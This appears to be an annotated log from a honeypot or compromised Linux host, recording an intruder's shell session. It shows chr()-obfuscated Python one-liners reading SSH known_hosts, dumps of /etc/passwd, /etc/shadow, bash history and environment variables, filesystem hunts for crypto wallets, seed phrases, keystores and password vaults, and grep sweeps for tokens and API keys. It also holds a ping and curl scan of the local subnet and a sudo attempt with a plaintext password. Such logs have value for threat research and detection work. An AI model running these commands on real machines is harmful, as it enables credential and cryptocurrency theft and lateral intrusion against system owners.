Ran uname 1x across 1 session — automated OS fingerprinting.
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); d=f.read(); f.close(); print hex(len(d)); print repr(d)"
$ perl -e "open(F,q(<),q(/root/.ssh/known_hosts)); while(<F>){print}" // Perl one-liner execution
$ more /root/.ssh/known_hosts 2>/dev/null || cat /root/.ssh/known_hosts
$ sed -n "p" /root/.ssh/known_hosts
$ cat /root/.ssh/known_hosts Γ3
$ /bin/sh -c "python -c \"import os; os.system(chr(108)+chr(115)+chr(32)+chr(45)+chr(97)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47))\"" // Python one-liner execution
$ python -c "import os; os.system(chr(108)+chr(115)+chr(32)+chr(45)+chr(97)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47))" // Python one-liner execution
$ /bin/sh -c "python -c \"import sys; f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print f.read().encode(chr(10)); f.close()\"" // Python one-liner execution
$ python -c "import sys; f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print f.read().encode(chr(10)); f.close()" // Python one-liner execution
$ /bin/sh -c "grep 207 /root/.ssh/known_hosts 2>/dev/null; grep 173 /root/.ssh/known_hosts 2>/dev/null; grep 147 /root/.ssh/known_hosts 2>/dev/null; grep 104 /root/.ssh/known_hosts 2>/dev/null; echo GREP_DONE"
$ grep 207 /root/.ssh/known_hosts 2>/dev/null; grep 173 /root/.ssh/known_hosts 2>/dev/null; grep 147 /root/.ssh/known_hosts 2>/dev/null; grep 104 /root/.ssh/known_hosts 2>/dev/null; echo GREP_DONE
$ /bin/sh -c "grep -E "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" /root/.ssh/known_hosts"
$ grep -E [ 0-9 ] +. [ 0-9 ] +. [ 0-9 ] +. [ 0-9 ] + /root/.ssh/known_hosts
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | python -c \"import sys; data=sys.stdin.read(); print repr(data)\"" // Python one-liner execution
$ dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | python -c "import sys; data=sys.stdin.read(); print repr(data)" // Python one-liner execution
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | wc -c" // disk operation
$ dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | wc -c // disk operation
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=442 count=1 2>/dev/null | wc -c" // disk operation
$ dd if=/root/.ssh/known_hosts bs=442 count=1 2>/dev/null | wc -c // disk operation
$ /bin/sh -c "python -c \"f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); data=f.read(); print len(data); f.close()\""
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); data=f.read(); print len(data); f.close()"
$ /bin/sh -c "ls -la /root/.ssh/; ls -la /root/.ssh/known_hosts; wc -c < /root/.ssh/known_hosts"
$ ls -la /root/.ssh/; ls -la /root/.ssh/known_hosts; wc -c < /root/.ssh/known_hosts
$ /bin/sh -c "cat /root/.ssh/known_hosts; echo ===END_KH==="
$ cat /root/.ssh/known_hosts; echo ===END_KH===
$ echo hello
$ sh -c echo test2
$ echo test2
$ /bin/sh -c echo test
$ echo test
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print repr(f.read()); f.close()"
$ python -c "print open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116)).read()"
$ python -c "import os; os.system(chr(98)+chr(97)+chr(115)+chr(101)+chr(54)+chr(52)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116))" // Python one-liner execution
$ /bin/sh -c "base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt; cat /tmp/kh_b64.txt" // execute from /tmp
$ base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt; cat /tmp/kh_b64.txt // execute from /tmp
$ cat /tmp/kh_b64.txt // execute from /tmp
$ base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt // execute from /tmp
$ dd if=/root/.ssh/known_hosts 2>/dev/null // disk operation
$ python -c "print(open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116)).read())" 2>/dev/null || echo "FAIL"
$ ls -la /var/backups/ 2>/dev/null
$ cat /root/.ssh/known_hosts | head
$ ls -la /root/.ssh/known_hosts; od -c /root/.ssh/known_hosts | head -5
$ wc -c /root/.ssh/known_hosts; cat /root/.ssh/known_hosts; echo "END"
$ find / -name "id_*" -o -name "*.pub" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"
$ ls -la /root/.ssh/
$ cat /etc/ssh/ssh_host_ecdsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.1',22)); print('22:OPEN'); s.close()" 2>&1; echo '==='; python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.2',22)); print('22:OPEN'); s.close()" 2>&1; echo '==='; python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.10',22)); print('22:OPEN'); s.close()" 2>&1 // Python one-liner execution
$ curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.1/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.2/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.3/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.4/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.5/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.6/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.7/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.9/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.10/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.11/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.12/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.13/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.14/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.15/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.16/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.17/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.18/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.19/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.20/ 2>&1; echo '' // payload download
$ ping 10.0.28.20 2>&1 | head -1
$ ping 10.0.28.19 2>&1 | head -1
$ ping 10.0.28.18 2>&1 | head -1
$ ping 10.0.28.17 2>&1 | head -1
$ ping 10.0.28.16 2>&1 | head -1
$ ping 10.0.28.15 2>&1 | head -1
$ ping 10.0.28.14 2>&1 | head -1
$ ping 10.0.28.13 2>&1 | head -1
$ ping 10.0.28.12 2>&1 | head -1
$ ping 10.0.28.11 2>&1 | head -1
$ ping 10.0.28.10 2>&1 | head -1
$ ping 10.0.28.9 2>&1 | head -1
$ ping 10.0.28.8 2>&1 | head -1
$ ping 10.0.28.7 2>&1 | head -1
$ ping 10.0.28.6 2>&1 | head -1
$ ping 10.0.28.5 2>&1 | head -1
$ ping 10.0.28.4 2>&1 | head -1
$ ping 10.0.28.3 2>&1 | head -1
$ ping 10.0.28.2 2>&1 | head -1
$ ping 10.0.28.1 2>&1 | head -1
$ ping 10.0.28.1 2>&1
$ ping -n -c 1 10.0.28.1 2>&1; echo "==="
$ ping -c 1 10.0.28.1 2>&1; echo "==="; ping -c 1 10.0.28.2 2>&1; echo "==="; ping -c 1 10.0.28.10 2>&1
$ ping -c 1 -w 1 10.0.28.1 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.2 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.3 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.4 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.5 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.6 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.7 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.9 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.10 2>&1
$ for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25; do; result=$(ping -c 1 -w 1 10.0.28.$i 2>&1); if echo "$result" | grep -q "64 bytes"; then; echo "ALIVE: 10.0.28.$i"; fi; done; echo "---LOCAL_SCAN_DONE---"
$ ping -c 1 -w 1 10.0.28.$i 2 >& 1
$ echo "---PING_VPN---"; ping -c 1 -W 2 207.180.241.246 2>&1; echo "---PING_HOSTING1---"; ping -c 1 -W 2 173.224.125.34 2>&1; echo "---PING_HOSTING2---"; ping -c 1 -W 2 muddy.mwgsm.com 2>&1; echo "---PING_N8N---"; ping -c 1 -W 2 147.93.154.84 2>&1; echo "---DNS_REVERSE---"; nslookup 104.152.208.8 2>&1 || host 104.152.208.8 2>&1 || echo "no nslookup/host"; echo "---ARP_TABLE---"; cat /proc/net/arp 2>/dev/null || echo "no arp"; echo "---ROUTING---"; route -n 2>/dev/null || netstat -rn 2>/dev/null; echo "---GATEWAY_CHECK---"; ping -c 1 -W 2 104.152.208.1 2>&1; echo "---DONE_PING---"
$ ping -c 1 -W 1 104.180.241.246 2>/dev/null && echo "PONG_104.152.208.$i"
$ stat /etc/ssh/sshd_config
$ wc /etc/ssh/sshd_config
$ wc -l /etc/ssh/sshd_config; wc -c /etc/ssh/sshd_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/sshd_config 2>/dev/null; echo "---HOST_KEYS---"; cat /etc/ssh/ssh_host_dsa_key.pub 2>/dev/null; echo "---HOST_RSA---"; cat /etc/ssh/ssh_host_rsa_key.pub 2>/dev/null; echo "---HOST_ECDSA---"; cat /etc/ssh/ssh_host_ecdsa_key.pub 2>/dev/null
$ du -sh /* 2>/dev/null; echo "---SECDIR---"; ls -la /etc/ssh/ 2>/dev/null; echo "---SSH_CONFIG---"; cat /etc/ssh/sshd_config 2>/dev/null
$ echo "---KNOWN_HOSTS---"; cat /root/.ssh/known_hosts 2>/dev/null; echo "---APTITUDE---"; cat /root/.aptitude/config 2>/dev/null; echo "---ROOT_BASHRC---"; cat /root/.bashrc 2>/dev/null; echo "---DISK_USAGE_DETAIL---"; du -sh /* 2>/dev/null; du -sh /var/* 2>/dev/null; du -sh /etc/* 2>/dev/null | grep -v -E "0K|4$"; echo "---DONE---"
$ find /home -type f 2>/dev/null; echo "---H_DONE---"; find /root -type f 2>/dev/null; echo "---R_DONE---"; find /opt -type f 2>/dev/null; echo "---O_DONE---"; find /srv -type f 2>/dev/null; echo "---S_DONE---"
$ find / -maxdepth 6 -type f -name "*wallet*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W1---"; find / -maxdepth 6 -type f -name "*mnemonic*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W2---"; find / -maxdepth 6 -type f -name "*seed*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W3---"; find / -maxdepth 6 -type f -name "*.kdbx" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W4---"; find / -maxdepth 6 -type f -name "*keystore*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W5---"
$ echo "---FIND_WALLET---"; find / -maxdepth 6 -type f \( -name "*wallet*" -o -name "*mnemonic*" -o -name "*seed*" -o -name "*private*key*" -o -name "*keystore*" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*bip39*" -o -name "*ledger*" -o -name "*trezor*" -o -name "*metamask*" -o -name "*phantom*" -o -name "*coinbase*" \) 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---FIND_TEXT_CONTENT---"; find /home -type f 2>/dev/null; find /root -type f 2>/dev/null | grep -v -E "/proc|/sys"; echo "---FIND_ANY_DATA---"; find /opt /srv /var/www /data /home /root -type f 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---DONE_WALLET---"
$ ps aux | grep -v grep | grep -E "mysql|ejabberd|exim|php|apache|nginx"
$ find / -maxdepth 5 -type f -size +1k -size -1M -newer /etc/hostname 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local|dpkg|apt|log|cache|/tmp"
$ find / -maxdepth 5 -type f -size +1k -size -1M -newer /etc/hostname 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local|dpkg|apt|log|cache|/tmp" | head -50
$ grep -r -l -i "password\|secret\|api_key\|apikey\|token" /etc/ 2>/dev/null | grep -v -E "/proc|/sys|/usr/share|/etc/ssl|/etc/pam|/etc/apt" | head -30
$ ls /etc/init.d/
$ cat /etc/init.d/ssh | grep -v "^#" | grep -v "^$"
$ echo "---RC_LOCAL_TYPE---"; strings /etc/rc.local 2>/dev/null | head -30; echo "---INIT_SCRIPTS---"; for f in /etc/init.d/*; do echo "--- $f ---"; cat "$f" 2>/dev/null | grep -v "^#" | grep -v "^$" | head -10; done; echo "---FIND_EJABBERD_CONFIG---"; find / -maxdepth 5 -name "ejabberd*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_MYSQL_CONFIG---"; find / -maxdepth 5 -name "my.cnf" -o -name "mysqld*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_EXIM_CONFIG---"; find / -maxdepth 5 -name "exim*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_VBOX_GUEST---"; find / -maxdepth 4 -name "*vbox*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---FIND_VALET/DOCKER/ANY_RUNTIME---"; ls -la /var/run/ 2>/dev/null | head -30; echo "---DONE---"
$ echo "---RC_LOCAL_CONTENTS---"; cat /etc/rc.local 2>/dev/null; echo "---FIND_NFS---"; cat /etc/fstab 2>/dev/null; echo "---FIND_MOUNTS---"; mount 2>/dev/null; echo "---FIND_ANY_NFS---"; cat /etc/exports 2>/dev/null; echo "---FIND_NETWORK_CONF---"; cat /etc/network/interfaces 2>/dev/null; echo "---FIND_KVM_VBOX---"; lsmod 2>/dev/null; echo "---FIND_VBOX_GUEST---"; ls /usr/lib/virtualbox/ 2>/dev/null; echo "---FIND_VBOX_CONFIG---"; cat /etc/vbox/VBoxNet.conf 2>/dev/null; echo "---FIND_DB_FILES---"; find / -maxdepth 5 -type f \( -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" \) 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_CONFIG_FILES_CONTENTS---"; grep -r -l "password\|secret\|api_key\|apikey\|token\|private" /etc/ 2>/dev/null | grep -v -E "/proc|/sys|/usr/share|/etc/ssl|/etc/pam" | head -30; echo "---DONE---"
$ echo "---PYTHON_VERSION---"; python --version 2>&1; echo "---WHAT_PYTHON_IS---"; which python; file $(which python); echo "---INITDB---"; ls /etc/init.d/ | sort; echo "---UPSTART---"; ls /etc/init/ 2>/dev/null; echo "---FIND_SCRIPTS---"; find / -maxdepth 4 -type f -name "*.py" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys"; find / -maxdepth 4 -type f -name "*.sh" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys"; echo "---FIND_PHP---"; find / -maxdepth 4 -type f -name "*.php" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys|/usr/local"; echo "---FIND_RC_LOCAL---"; cat /etc/rc.local 2>/dev/null; echo "---FIND_ANYTHING_RECENT---"; find / -maxdepth 5 -type f -mtime -365 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local/lib|dpkg|apt|log|cache" | head -100; echo "---SYSCTL---"; cat /etc/sysctl.conf 2>/dev/null | grep -v "^#" | grep -v "^$"; echo "---DONE---"
$ which python
$ echo "---MYSQL_SOCKET---"; ls -la /var/run/mysqld/ 2>/dev/null; ls -la /tmp/mysql* 2>/dev/null; echo "---MYSQL_PROC---"; ps aux | grep mysql; echo "---EJABBERD_PROC---"; ps aux | grep ejabberd; echo "---EXIM_PROC---"; ps aux | grep exim; echo "---ALL_LISTENING---"; ss -tlnp 2>/dev/null; echo "---ALL_LISTENING2---"; netstat -tlnp 2>/dev/null; echo "---NETSTAT_ALL---"; netstat -anp 2>/dev/null | head -50; echo "---MYSQL_DATA_DIR---"; ls -la /var/lib/mysql/ 2>/dev/null || echo "empty or no access"; echo "---PHPMYADMIN---"; ls -la /var/www/phpmyadmin/ 2>/dev/null || echo "no phpmyadmin"; echo "---MYSQL_BACKUPS---"; find / -maxdepth 3 -name "*.sql" 2>/dev/null; echo "---DONE---" // execute from /tmp
$ echo "---MYSQL---"; cat /etc/mysql/my.cnf 2>/dev/null | grep -v "^#" | grep -v "^$"; ls /etc/mysql/conf.d/ 2>/dev/null; echo "---MYSQL_DATA---"; ls /var/lib/mysql/ 2>/dev/null; echo "---EJABBERD---"; cat /etc/ejabberd/ejabberd.cfg 2>/dev/null | head -80; echo "---EJABBERD2---"; cat /etc/ejabberd/ejabberd.yml 2>/dev/null | head -80; echo "---PHIL_HOME---"; ls -la /home/phil/ 2>/dev/null; cat /home/phil/.bashrc 2>/dev/null; cat /home/phil/.bash_history 2>/dev/null; echo "---WWW---"; ls -laR /var/www/ 2>/dev/null | head -50; echo "---MAIL---"; ls -la /var/mail/ 2>/dev/null; ls -la /var/spool/mail/ 2>/dev/null; echo "---EXIM---"; cat /etc/exim4/exim4.conf.localmacros 2>/dev/null | head -30; echo "---NETWORK---"; netstat -tlnp 2>/dev/null; echo "---DONE---" // history snooping
$ cat /root/.ssh/authorized_keys 2>/dev/null; echo "---SSH_DONE---"; cat /root/.ssh/id_rsa 2>/dev/null; echo "---KEY_DONE---" // SSH key persistence
$ ps aux; echo "---PROC_DONE---"; ls -la /root/ 2>/dev/null; echo "---ROOT_DONE---"; ls -la /opt/ 2>/dev/null; echo "---OPT_DONE---"; ls -la /srv/ 2>/dev/null; echo "---SRV_DONE---"; ls -la /var/www/ 2>/dev/null; echo "---WWW_DONE---"; cat /etc/passwd; echo "---PASSWD_DONE---" // user enumeration
$ find / -maxdepth 5 -type f -name "*.conf" 2>/dev/null | grep -v -E "/proc/|/sys/|/usr/share|/usr/lib|/usr/share/doc|dpkg" | head -50; echo "---CONF_DONE---"
$ find / -maxdepth 5 -type f \( -name "*.txt" -o -name "*.md" -o -name "*.csv" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.conf" -o -name "*.cfg" -o -name "*.ini" \) 2>/dev/null | grep -v -E "/proc/|/sys/|/usr/share|/usr/lib|/usr/share/doc|dpkg" | head -100; echo "---CONF_DONE---"
$ find / -maxdepth 4 -type f -name "*.env" -o -name ".env" -o -name "*.pem" -o -name "*.key" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*.wallet" 2>/dev/null; echo "---FILE_LIST_DONE---"
$ echo "=== ANY FILE WITH PASSWORD IN / ==="; find / -maxdepth 4 -type f \( -name "*.env" -o -name ".env" -o -name "*.pem" -o -name "*.key" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*.wallet" \) 2>/dev/null; echo "=== TEXT FILES WITH mnemonic OR seed OR wallet ==="; find / -maxdepth 5 -type f -name "*.txt" -o -name "*.md" -o -name "*.csv" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.conf" 2>/dev/null | head -100; echo "=== CHECK COMMON SECRETS PATHS ==="; ls -la /root/ 2>/dev/null || echo "cannot read /root"; ls -la /opt/ 2>/dev/null || echo "cannot read /opt"; ls -la /srv/ 2>/dev/null || echo "cannot read /srv"; ls -la /var/www/ 2>/dev/null || echo "cannot read /var/www"; echo "=== USER HOME DIRS ==="; cat /etc/passwd; echo "=== CHECK ANY SSH KEYS ON SYSTEM ==="; find / -maxdepth 4 -name "id_*" -o -name "known_hosts" -o -name "ssh_config" 2>/dev/null; echo "=== CHECK /ETC/SHADOW ==="; cat /etc/shadow 2>/dev/null | head -20 || echo "cannot read /etc/shadow"; echo "=== CHECK FOR ANY DATABASE FILES ==="; find / -maxdepth 4 \( -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" -o -name "*.sql" \) 2>/dev/null; echo "=== CHECK FOR NODE/JS PROJECTS ==="; find / -maxdepth 4 -name "package.json" 2>/dev/null; echo "=== CHECK FOR PYTHON PROJECTS ==="; find / -maxdepth 4 -name "requirements.txt" 2>/dev/null; echo "=== CHECK FOR VIRTUAL HOSTS ==="; ls -la /etc/nginx/ 2>/dev/null || echo "no nginx"; ls -la /etc/apache2/ 2>/dev/null || echo "no apache"; ls -la /etc/lighttpd/ 2>/dev/null || echo "no lighttpd"; echo "=== CHECK FOR ANY RUNNING PROCESSES ==="; ps aux 2>/dev/null; echo "=== DONE ===" // user enumeration
$ echo "=== INSTALLED PACKAGES ==="; dpkg -l 2>/dev/null | head -100; echo "=== WHICH COMMANDS ==="; which python node npm docker mongod redis mysql psql tmux screen git curl wget 2>/dev/null; echo "=== /tmp ==="; ls -la /tmp/ 2>/dev/null | head -30; echo "=== /var/log ==="; ls -la /var/log/ 2>/dev/null | head -30; echo "=== /etc/cron* ==="; ls -la /etc/cron* 2>/dev/null; cat /etc/crontab 2>/dev/null; echo "=== SYSTEMD ==="; ls /etc/init.d/ 2>/dev/null; echo "=== NETWORK ==="; route -n 2>/dev/null; cat /etc/resolv.conf 2>/dev/null; cat /etc/hosts 2>/dev/null; echo "=== /etc/ssh ==="; cat /etc/ssh/sshd_config 2>/dev/null | grep -v "^#" | grep -v "^$"; echo "=== /etc/hostname ==="; cat /etc/hostname 2>/dev/null; echo "=== /etc/os-release ==="; cat /etc/issue 2>/dev/null // persistence setup
$ echo OK
$ echo Muddy2!@#2wsx | sudo -S echo SUDO_OK
$ echo '=== .SSH DIR ==='; ls -la ~/.ssh/ 2>/dev/null || echo 'no .ssh'; echo '=== SSH KEYS ==='; cat ~/.ssh/id_* 2>/dev/null || echo 'no private keys'; cat ~/.ssh/authorized_keys 2>/dev/null || echo 'no authorized_keys'; echo '=== ENV VARS ==='; env | sort; echo '=== HOME FILES ==='; ls -la ~/; echo '=== HOME DIRS ==='; find ~ -maxdepth 3 -type f -name '*.env' -o -name '.env' -o -name '*.pem' -o -name '*.key' -o -name '*.crt' -o -name '*.pem' -o -name 'wallet*' -o -name 'mnemonic*' -o -name 'seed*' -o -name '*.kdbx' -o -name 'keystore*' -o -name '.passwords*' -o -name '*.txt' -o -name 'credentials*' 2>/dev/null | head -50; echo '=== RECENT FILES ==='; find ~ -maxdepth 3 -type f -mtime -90 2>/dev/null | head -50; echo '=== SUDO PASSWD ==='; sudo -S echo SUDO_WORKED <<< 'Muddy2!@#2wsx' 2>&1 // password change attempt
$ echo '=== SYSTEM INFO ==='; uname -a; hostname; echo '=== WHOAMI ==='; whoami; id; echo '=== SUDO ACCESS ==='; sudo -l 2>/dev/null; echo '=== USERS ==='; cat /etc/passwd | grep -v nologin | grep -v false; echo '=== LISTENING PORTS ==='; ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null; echo '=== RUNNING SERVICES ==='; systemctl list-units --type=service --state=running 2>/dev/null | head -60; echo '=== CRONTAB ==='; crontab -l 2>/dev/null; echo '=== DOCKER ==='; docker ps -a 2>/dev/null || echo 'no docker'; echo '=== MOUNTS ==='; df -h 2>/dev/null; echo '=== IP ADDRESSES ==='; ip addr show 2>/dev/null | grep 'inet '; echo '=== LAST LOGIN ==='; last -5 2>/dev/null; echo '=== BASH HISTORY ==='; cat ~/.bash_history 2>/dev/null | tail -80; echo '=== END ===' // user enumeration
$ echo OK_Muddy2!@#2wsx